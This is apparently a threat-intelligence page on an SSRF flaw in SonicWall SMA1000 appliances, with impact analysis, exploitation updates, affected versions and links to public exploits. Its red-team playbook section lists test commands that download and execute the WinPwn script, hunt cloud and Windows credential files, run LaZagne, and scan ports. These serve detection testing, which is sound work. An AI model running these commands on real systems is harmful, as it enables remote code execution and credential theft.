CVE-2026-15409
Overview
This vulnerability is a Server-Side Request Forgery (SSRF) affecting the SonicWall SMA1000 Appliance Work Place interface. The root cause lies in improper validation of user-supplied URLs, allowing the appliance to be manipulated into making arbitrary HTTP requests. The flaw exists within the appliance's internal request handling mechanism, specifically in the interface that processes incoming request parameters without adequate origin verification.
Vulnerability Description
A Server-side request forgery (SSRF) vulnerability has been identified in the SMA1000 Appliance Work Place interface. A remote unauthenticated attacker could potentially cause the appliance to make requests to unintended location.
Impact
An unauthenticated attacker can leverage this SSRF vulnerability to make the SonicWall SMA1000 appliance initiate requests to internal network services or external systems. This can lead to unauthorized information disclosure from internal resources, potential access to metadata services, or interaction with otherwise inaccessible services. The attacker requires no credentials or user interaction, enabling remote exploitation that may facilitate further network reconnaissance or lateral movement within the environment, potentially compromising sensitive data or internal infrastructure.
Solution
SonicWall has released an advisory (SNWLID-2026-0008) addressing this SSRF vulnerability in the SMA1000 Appliance. Administrators should apply the vendor-provided patches as detailed in the advisory to affected SMA1000 versions. The advisory includes specific firmware updates and configuration guidance to mitigate the issue. For comprehensive patch instructions and version details, refer to the SonicWall PSIRT advisory at https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The identified vulnerability within the SMA1000 Appliance Work Place interface is characterized as a server-side request forgery (SSRF). This type of vulnerability allows an attacker to manipulate the server into making requests to unintended locations, potentially exposing sensitive information or interacting with internal services that should not be accessible externally. The flaw arises from insufficient validation of user-supplied input, which permits an unauthenticated remote attacker to craft requests that the server processes, leading to unauthorized access to internal resources or external systems.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage the appliance's interface to send crafted requests that target internal services, such as databases, metadata services, or even other networked devices that are not intended to be exposed to the public internet. For example, if the appliance is configured to communicate with a database or a cloud service, an attacker could exploit the SSRF vulnerability to retrieve sensitive data or execute commands on those services. Furthermore, the attacker could use this access to pivot to other systems within the network, escalating their attack and potentially leading to a broader compromise.
The real-world impact of such a vulnerability can be severe, particularly for organizations relying on the SMA1000 Appliance for critical operations. The potential for data exfiltration, unauthorized access to internal systems, and the ability to conduct reconnaissance on the network can lead to significant business risks. Organizations may face financial losses, reputational damage, and regulatory penalties if sensitive data is compromised. Additionally, the high CVSS score of 10.0 indicates that this vulnerability poses an extreme risk, necessitating immediate attention from security teams to mitigate its effects.
To effectively detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching the affected appliance is crucial to ensure that known vulnerabilities are addressed. Network segmentation can also be an effective strategy, isolating critical internal services from external access and limiting the potential impact of an SSRF attack. Furthermore, organizations should employ web application firewalls (WAFs) and intrusion detection systems (IDS) to monitor and filter incoming requests, identifying and blocking suspicious activities before they reach the vulnerable interface.
In conclusion, the server-side request forgery vulnerability in the SMA1000 Appliance Work Place interface represents a significant threat to organizations that utilize this technology. The ability for an unauthenticated attacker to manipulate server requests can lead to severe consequences, including unauthorized access to sensitive information and internal systems. By understanding the technical details, potential attack vectors, and real-world implications, organizations can take proactive measures to detect and mitigate this vulnerability, thereby safeguarding their assets and maintaining the integrity of their operations.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2026-15409, coinciding with its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition elevates the vulnerability’s profile, underscoring its criticality and the urgency for organizations to prioritize remediation efforts. The CVSS score adjustment to 10.0 reflects a reassessment of the vulnerability’s potential impact, confirming it as a critical risk with a high likelihood of exploitation. Additionally, the emergence of a ransomware group association, specifically with the Sinobi group, signals an increased threat vector where adversaries may leverage this SSRF flaw to facilitate lateral movement or data exfiltration in ransomware campaigns. Although our telemetry does not yet indicate widespread exploitation or rapid growth in attack attempts, the convergence of these factors—heightened detection, authoritative cataloging, and ransomware linkage—necessitates a recalibrated risk posture. Defenders should interpret this as a significant escalation in threat level, with CVE-2026-15409 now representing an active and prioritized vector for targeted attacks against SonicWall SMA1000 deployments.
Update 2 — July 23, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2026-15409, characterized by a substantial increase in exploitation attempts and the emergence of multiple new proof-of-concept exploits publicly available on GitHub. This expansion of the exploit landscape includes sophisticated multi-stage frameworks enabling remote code execution and privilege escalation, significantly lowering the barrier for adversaries to weaponize this SSRF vulnerability. Concurrently, the EPSS score has risen to a notable level, reflecting increased likelihood of exploitation in the wild. Although ransomware groups have not been definitively linked to this vulnerability, the presence of advanced exploitation tools and heightened detection rates signal an elevated risk of integration into broader attack campaigns. For defenders, this development underscores the urgency of prioritizing monitoring and response efforts for SonicWall SMA1000 environments, as the vulnerability is transitioning from theoretical risk to active exploitation. The threat level should now be considered critically elevated, warranting immediate attention within organizational risk management frameworks.
Update 3 — August 14, 2026
CSURFACE threat intelligence has identified a significant shift in the exploitation landscape of CVE-2026-15409, marked by the emergence of a Metasploit module that substantially lowers the technical barrier for attackers. This development coincides with a marked increase in the Exploit Prediction Scoring System (EPSS) score, which has surged by over 350%, reflecting heightened likelihood of exploitation in the wild. Our telemetry indicates a slight but consistent uptick in detection activity, suggesting that threat actors are actively leveraging newly available tooling to target SonicWall SMA1000 appliances. The availability of multiple proof-of-concept exploits, including frameworks enabling unauthenticated remote code execution and privilege escalation, further amplifies the risk profile. Although ransomware groups such as Sinobi remain associated with campaigns exploiting this vulnerability, no high-confidence direct linkage has yet been confirmed. Nonetheless, the combination of advanced exploitation tools and increased detection frequency elevates the threat level to critical. Defenders should interpret this as a clear signal that CVE-2026-15409 is transitioning from a theoretical vulnerability to an actively exploited vector with significant operational impact potential.
Affected Products (18)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sonicwall | Sma8200v | 12.4.3-03245 |
cpe:2.3:a:sonicwall:sma8200v:12.4.3-03245:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma8200v | 12.4.3-03387 |
cpe:2.3:a:sonicwall:sma8200v:12.4.3-03387:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma8200v | 12.4.3-03434 |
cpe:2.3:a:sonicwall:sma8200v:12.4.3-03434:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma8200v | 12.5.0-02283 |
cpe:2.3:a:sonicwall:sma8200v:12.5.0-02283:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma8200v | 12.5.0-02624 |
cpe:2.3:a:sonicwall:sma8200v:12.5.0-02624:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma8200v | 12.5.0-02800 |
cpe:2.3:a:sonicwall:sma8200v:12.5.0-02800:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma6210 Firmware | 12.4.3-03245 |
cpe:2.3:o:sonicwall:sma6210_firmware:12.4.3-03245:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma6210 Firmware | 12.4.3-03387 |
cpe:2.3:o:sonicwall:sma6210_firmware:12.4.3-03387:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma6210 Firmware | 12.4.3-03434 |
cpe:2.3:o:sonicwall:sma6210_firmware:12.4.3-03434:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma6210 Firmware | 12.5.0-02283 |
cpe:2.3:o:sonicwall:sma6210_firmware:12.5.0-02283:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma6210 Firmware | 12.5.0-02624 |
cpe:2.3:o:sonicwall:sma6210_firmware:12.5.0-02624:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma6210 Firmware | 12.5.0-02800 |
cpe:2.3:o:sonicwall:sma6210_firmware:12.5.0-02800:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma7210 Firmware | 12.4.3-03245 |
cpe:2.3:o:sonicwall:sma7210_firmware:12.4.3-03245:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma7210 Firmware | 12.4.3-03387 |
cpe:2.3:o:sonicwall:sma7210_firmware:12.4.3-03387:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma7210 Firmware | 12.4.3-03434 |
cpe:2.3:o:sonicwall:sma7210_firmware:12.4.3-03434:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma7210 Firmware | 12.5.0-02283 |
cpe:2.3:o:sonicwall:sma7210_firmware:12.5.0-02283:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma7210 Firmware | 12.5.0-02624 |
cpe:2.3:o:sonicwall:sma7210_firmware:12.5.0-02624:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma7210 Firmware | 12.5.0-02800 |
cpe:2.3:o:sonicwall:sma7210_firmware:12.5.0-02800:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
SonicWall SMA1000 WorkPlace wsproxy SSRF Remote Command Execution
exploits/linux/http/sonicwall_sma1000_wsproxy_rce
|
Ryan Emmons, Deral Heiland, Rapid7 Vulnerability Research | Unknown | - | View |
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
remmons-r7/rapid7-CVE-2026-15409
This repo contains a proof-of-concept exploit for CVE-2026-15409. It establishes non-root remote code execution on Sonic...
|
remmons-r7 | 27 | 6 | 2026-07-15 | View |
|
tc4dy/CVE-2026-15409-15410-Framework
CVE-2026-15409/15410 SonicWall SMA1000 multi-exploit Framework 🔥 SSRF→Erlang RPC→RCE→root privesc. Features: --detect sa...
|
tc4dy | 5 | 4 | 2026-07-17 | View |
|
Ch4120N/CVE-2026-15409
Proof-of-Concept exploit for CVE-2026-15409 (SonicWall SMA 1000 RCE) via Erlang distribution over WebSocket. Achieves un...
|
Ch4120N | 3 | 0 | 2026-08-03 | View |
|
0xBlackash/CVE-2026-15409
CVE-2026-15409
|
0xBlackash | 3 | 0 | 2026-07-15 | View |
|
MrRawBit/SonicWall-SMA1000-Zero-Day-IoC-Check
Unofficial Bash IoC checker for SonicWall SMA1000 appliances affected by actively exploited CVE-2026-15409 and CVE-2026-...
|
MrRawBit | 0 | 0 | 2026-07-16 | View |
|
HORKimhab/CVE-2026-15409
CVE-2026-15409 - Dectect
|
HORKimhab | 0 | 0 | 2026-07-15 | View |
Threat Feed
30 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (274 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Ransomware group known to exploit this vulnerability (274 known victims)
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-664 | Server Side Request Forgery |
34%
|
High | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-15409 |
| psirt.global.sonicwall.com |
GitHub CVE
vendor-advisory
|
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008 |
| cisa.gov |
NVD API
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15409 |